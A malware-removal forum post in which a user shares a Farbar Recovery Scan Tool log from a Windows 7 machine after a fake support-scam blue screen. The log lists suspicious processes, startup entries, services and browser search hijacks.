1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

[Resolved] Blue screen appeared with error: 0xc0000428 ..asking me to call toll free number

Discussion in 'Spyware, Adware, Viruses and Malware Removal' started by photiost, Sep 18, 2016.

  1. photiost

    photiost Established Techie7 Member

    This the FRST scan:

    *** Initially I was warned the text is too long ...I had to shorten it ***
    *** remove `Some files in TEMP:` section ***

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-09-2016
    Ran by Administrator (administrator) on DELL35X8BT1 (18-09-2016 11:57:40)
    Running from C:\Users\Administrator\Downloads
    Loaded Profiles: Administrator (Available Profiles: Administrator)
    Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: FF)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
    (Microsoft Corporation) C:\Windows\System32\wlanext.exe
    (SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
    (Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
    () C:\ProgramData\Logic Handler\set.exe
    (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
    () C:\ProgramData\CloudPrinter\CloudPrinter.exe
    (DeskTopService) C:\ProgramData\desktopfindkey\desktop189.exe
    () C:\Program Files (x86)\Stlr\nerta\nertacs.exe
    (O2Micro International) C:\Windows\System32\drivers\o2flash.exe
    () C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe
    () C:\ProgramData\Ronzap\Ronzap.exe
    () C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs
    () C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
    (Intel Corporation) C:\Windows\System32\igfxtray.exe
    (Intel Corporation) C:\Windows\System32\hkcmd.exe
    (Intel Corporation) C:\Windows\System32\igfxpers.exe
    (IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
    (SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
    () C:\Program Files (x86)\Stlr\nerta\nerta.exe
    (Global surveys) C:\Users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe
    (Microsoft Corporation) C:\Windows\System32\rundll32.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
    (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
    (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [626552 2012-06-18] (Alps Electric Co., Ltd.)
    HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [525312 2011-02-15] (IDT, Inc.)
    HKLM\...\Run: [IDSCCOMVGX] => "C:\Program Files (x86)\EasyHotspot\idsccom_VGX.exe"
    HKLM\...\Run: [WINCOM6YE] => "C:\Program Files (x86)\mpck\wincom_6YE.exe"
    HKLM\...\Run: [WINCOM1YV] => "C:\Program Files (x86)\sunnyday\wincom_1YV.exe"
    HKLM\...\Run: [WINCOMCF4] => "C:\Program Files (x86)\sunnyday\wincom_CF4.exe"
    HKLM\...\Run: [WINCOMH7U] => "C:\Program Files (x86)\sunnyday\wincom_H7U.exe"
    HKLM\...\Run: [WINCOMTAO] => "C:\Program Files (x86)\sunnyday\wincom_TAO.exe"
    HKLM-x32\...\Run: [EasyHotspot] => "C:\Program Files (x86)\EasyHotspot\EasyHotspot.exe"
    HKLM-x32\...\Run: [DiskPower] => "C:\Program Files (x86)\DPower\DiskPower.exe"
    HKLM-x32\...\Run: [win_en_77] => [X]
    HKLM-x32\...\Run: [sun21] => "C:\Program Files (x86)\SunnyDay21\SunnyDay.exe"
    Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-09-12] (SUPERAntiSpyware)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Chromium] => c:\users\administrator\appdata\local\chromium\application\chrome.exe [1068544 2016-03-18] (The Chromium Authors)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Interstatnogui] => C:\Users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe [4110848 2016-09-18] (Global surveys)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [misgua] => C:\Users\Administrator\AppData\Local\misgua.dll [895488 2016-09-18] () <===== ATTENTION
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [MHX680O3EE] => "C:\Program Files (x86)\DPower\F10H5ROMJR.exe"
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [UD8BS0RW9M] => "C:\Program Files (x86)\DPower\OMAX7YIRM1.exe"
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Pritc] => C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe [3445760 2016-09-18] (VLOME) <===== ATTENTION
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [MP86W16DCV] => "C:\Program Files (x86)\DPower\NFQMP4E7QL.exe"
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [ID9KZOQAXP] => "C:\Program Files (x86)\DPower\NMJA5FXU1Z.exe"
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [R3TEGTCHQT] => "C:\Program Files (x86)\DPower\D7HVZHU1UW.exe"
    AppInit_DLLs: C:\ProgramData\Ronzap\S-la.dll => C:\ProgramData\Ronzap\S-la.dll [358912 2016-09-18] ()
    AppInit_DLLs-x32: C:\ProgramData\Ronzap\IndigoString.dll => C:\ProgramData\Ronzap\IndigoString.dll [248320 2016-09-18] ()
    ShellIconOverlayIdentifiers: [KzShlobj2] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F3} => C:\Program Files (x86)\KuaiZip\X64\KZipShell.dll No File
    Startup: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nerta.lnk [2016-09-18]
    ShortcutTarget: Nerta.lnk -> C:\Windows\System32\schtasks.exe (Microsoft Corporation)
    GroupPolicy: Restriction - Chrome <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 24.200.241.37 24.202.72.13
    Tcpip\..\Interfaces\{847875CA-4350-447D-B3C9-2FCDA250440E}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{89A762F9-B74D-436A-84D8-F2F7E6D9B073}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{B4EC977B-3636-4217-8CA1-D8DE45EDD7B6}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{B4EC977B-3636-4217-8CA1-D8DE45EDD7B6}: [DhcpNameServer] 192.168.0.1 24.200.241.37 24.202.72.13
    Tcpip\..\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6}: [DhcpNameServer] 10.254.240.200 10.254.240.201

    Internet Explorer:
    ==================
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldwz_16_37&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D344908437%26a%3Dwbf_dnldwz_16_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldwz_16_37&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D344908437%26a%3Dwbf_dnldwz_16_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1J11uXjiR7YVSkPeiKmfPOLv7QqXYORPqxweZDJKi_WHZcvGQzECwT7x46dUu4bTMH0VnvXC0zMNWVBv61pi6ALcMQ9CuX4UgfgJcy9a1i0k6XCPwlyZnfL1UVX9U6AZMwOEwroMs2KQBBAMr-quzCMLzWDEY_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.cloudynights.com/page/index.html
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1J11uXjiR7YVSkPeiKmfPOLv7QqXYORPqxweZDJKi_WHZcvGQzECwT7x46dUu4bTMH0VnvXC0zMNWVBv61pi6ALcMQ9CuX4UgfgJcy9a1i0k6XCPwlyZnfL1UVX9U6AZMwOEwroMs2KQBBAMr-quzCMLzWDEY_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1J11uXjiR7YVSkPeiKmfPOLv7QqXYORPqxweZDJKi_WHZcvGQzECwT7x46dUu4bTMH0VnvXC0zMNWVBv61pi6ALcMQ9CuX4UgfgJcy9a1i0k6XCPwlyZnfL1UVX9U6AZMwOEwroMs2KQBBAMr-quzCMLzWDEY_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}
    SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://ca.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_softdl4u_16_25&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyCtAyEtN1L2XzutAtFtBtAtFtCtFtBtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyDtDtAyCtAtD0FtDtGtDyB0BtDtGyDzy0EzytGyCzytD0BtGyByEtB0AyC0EyByByBtD0DyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D1235740085%26a%3Dwbf_softdl4u_16_25%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
    SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://ca.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_softdl4u_16_25&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyCtAyEtN1L2XzutAtFtBtAtFtCtFtBtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyDtDtAyCtAtD0FtDtGtDyB0BtDtGyDzy0EzytGyCzytD0BtGyByEtB0AyC0EyByByBtD0DyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D1235740085%26a%3Dwbf_softdl4u_16_25%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
    SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://ca.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldwz_16_37&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D344908437%26a%3Dwbf_dnldwz_16_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1J11uXjiR7YVSkPeiKmfPOLv7QqXYORPqxweZDJKi_WHZcvGQzECwT7x46dUu4bTMH0VnvXC0zMNWVBv61pi6ALcMQ9CuX4UgfgJcy9a1i0k6XCPwlyZnfL1UVX9U6AZMwOEwroMs2KQBBAMr-quzCMLzWDEY_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}
    SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://ca.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_softdl4u_16_25&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyCtAyEtN1L2XzutAtFtBtAtFtCtFtBtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyDtDtAyCtAtD0FtDtGtDyB0BtDtGyDzy0EzytGyCzytD0BtGyByEtB0AyC0EyByByBtD0DyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D1235740085%26a%3Dwbf_softdl4u_16_25%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
    SearchScopes: HKLM-x32 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://ca.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldwz_16_37&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D344908437%26a%3Dwbf_dnldwz_16_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-1896049756-2371463424-3974721238-500 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D091816-A251FF33716&form=CONBDF&conlogo=CT3334491&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1896049756-2371463424-3974721238-500 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D091816-A251FF33716&form=CONBDF&conlogo=CT3334491&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1896049756-2371463424-3974721238-500 -> {533D4D7B-F377-41D8-B141-A29968AF875A} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=G9Izftpbl0cshmoAU,488cdb43-66e8-4d85-9ddc-52057119e93e,
    SearchScopes: HKU\S-1-5-21-1896049756-2371463424-3974721238-500 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1J11uXjiR7YVSkPeiKmfPOLv7QqXYORPqxweZDJKi_WHZcvGQzECwT7x46dUu4bTMH0VnvXC0zMNWVBv61pi6ALcMQ9CuX4UgfgJcy9a1i0k6XCPwlyZnfL1UVX9U6AZMwOEwroMs2KQBBAMr-quzCMLzWDEY_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-09-05] (Microsoft Corporation)
    BHO: Icatti -> {7B6678FD-F9E3-46FD-aCF0-4C011573F737} -> C:\Program Files\Icatti\Orosbusf64.dll => No File
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
    BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-09-05] (Microsoft Corporation)
    BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2016-09-05] (Microsoft Corporation)
    BHO-x32: Icatti -> {7B6678FD-F9E3-46FD-aCF0-4C011573F737} -> C:\Program Files\Icatti\Orosbusf.dll => No File
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
    BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    StartMenuInternet: IEXPLORE.EXE - iexplore.exe

    FireFox:
    ========
    FF ProfilePath: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default
    FF NewTab: C:\\ProgramData\\Doubleings\\ff.NT
    FF DefaultSearchEngine: Search Module
    FF SelectedSearchEngine: Search Module
    FF Homepage: C:\\ProgramData\\Doubleings\\ff.HP
    FF Keyword.URL: user_pref("keyword.URL", true);
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-09-05] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-09-05] (Microsoft Corporation)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-04] (VideoLAN)
    FF user.js: detected! => C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\user.js [2016-09-18]
    FF SearchPlugin: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\bing-lavasoft.xml [2016-09-18]
    FF SearchPlugin: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\coldsearch.xml [2016-09-18]
    FF SearchPlugin: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\smod.xml [2016-09-18]
    FF SearchPlugin: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\trovi.xml [2016-09-18]
    FF Extension: (Firefox Hotfix) - C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-14]
    FF Extension: (Video DownloadHelper) - C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-09-16]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
    R2 backlh; C:\ProgramData\Logic Handler\set.exe [2089472 2016-05-15] () [File not signed]
    R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2980032 2016-09-05] (Microsoft Corporation)
    R2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [2148864 2016-09-18] () [File not signed]
    R2 DeskTop_E; C:\ProgramData\desktopfindkey\desktop189.exe [243936 2016-07-26] (DeskTopService) <==== ATTENTION
    R2 nrtService; C:\Program Files (x86)\Stlr\nerta\nertacs.exe [12288 2016-08-16] () [File not signed] <==== ATTENTION
    R2 ProntSpooler; C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe [134656 2016-05-19] () [File not signed] <==== ATTENTION
    R2 Ronzap; C:\ProgramData\\Ronzap\\Ronzap.exe [2148864 2016-09-18] () [File not signed]
    S2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [3109888 2016-09-18] (Search Module Ltd.) [File not signed]
    S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
    R2 zigipyro; C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp [158720 2015-12-26] () [File not signed]
    S2 CltMngSvc; C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe [X]
    S2 FastCompress; C:\Program Files (x86)\FastCompress-Zip\Fast_Support.exe [X] <==== ATTENTION
    S2 HpSvc; C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll [X] <==== ATTENTION
    S2 Kuaizip Update Checker; C:\Program Files (x86)\KuaiZip\X86\kuaizipUpdateChecker.dll [X]
    S2 rtop; "C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe" [X]
    R2 xytekyby; C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs [X]

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 atmeltpm; C:\Windows\system32\drivers\atmeltpm64.sys [19456 2012-05-25] (Atmel, Inc.)
    S3 BCMTPM; C:\Windows\system32\drivers\btpmwx64.sys [32096 2012-05-25] (Broadcom Corp.)
    S3 d554gps; C:\Windows\system32\drivers\d554gps64.sys [102440 2012-06-18] (Ericsson AB)
    S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
    S3 ecnssndis; C:\Windows\System32\Drivers\wwuss64.sys [26664 2012-06-18] (Ericsson AB)
    S3 ecnssndisfltr; C:\Windows\System32\Drivers\wwussf64.sys [29736 2012-06-18] (Ericsson AB)
    R2 KuaiZipDrive2; C:\WINDOWS\system32\drivers\KuaiZipDrive2.sys [93072 2016-09-18] (WinMount International Inc) <==== ATTENTION
    S3 Mbm3CBus; C:\Windows\system32\drivers\Mbm3CBus.sys [419400 2012-06-18] (MCCI Corporation)
    S3 Mbm3DevMt; C:\Windows\system32\drivers\Mbm3DevMt.sys [430664 2012-06-18] (MCCI Corporation)
    S3 nwdelgobi3kfilter; C:\Windows\system32\drivers\nwdelgobi3kfilter.sys [34304 2012-11-06] (Novatel Wireless Inc)
    S3 NWDellPort; C:\Windows\system32\drivers\nwdelser.sys [222208 2012-11-06] (Novatel Wireless Inc.)
    S3 NWDellPort2; C:\Windows\system32\drivers\nwdelser2.sys [222208 2012-11-06] (Novatel Wireless Inc.)
    S3 nwdelserial; C:\Windows\system32\drivers\nwdelserial.sys [234112 2012-11-06] (Novatel Wireless Inc.)
    S3 qcfilterdl2k; C:\Windows\system32\drivers\qcfilterdl2k.sys [6400 2012-07-05] (QUALCOMM Incorporated)
    S3 qcombusdl; C:\Windows\system32\drivers\qcombusdl.sys [137800 2012-07-05] (MCCI)
    S3 qcusbserdl2k; C:\Windows\system32\drivers\qcusbserdl2k.sys [230784 2012-07-05] (QUALCOMM Incorporated)
    R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
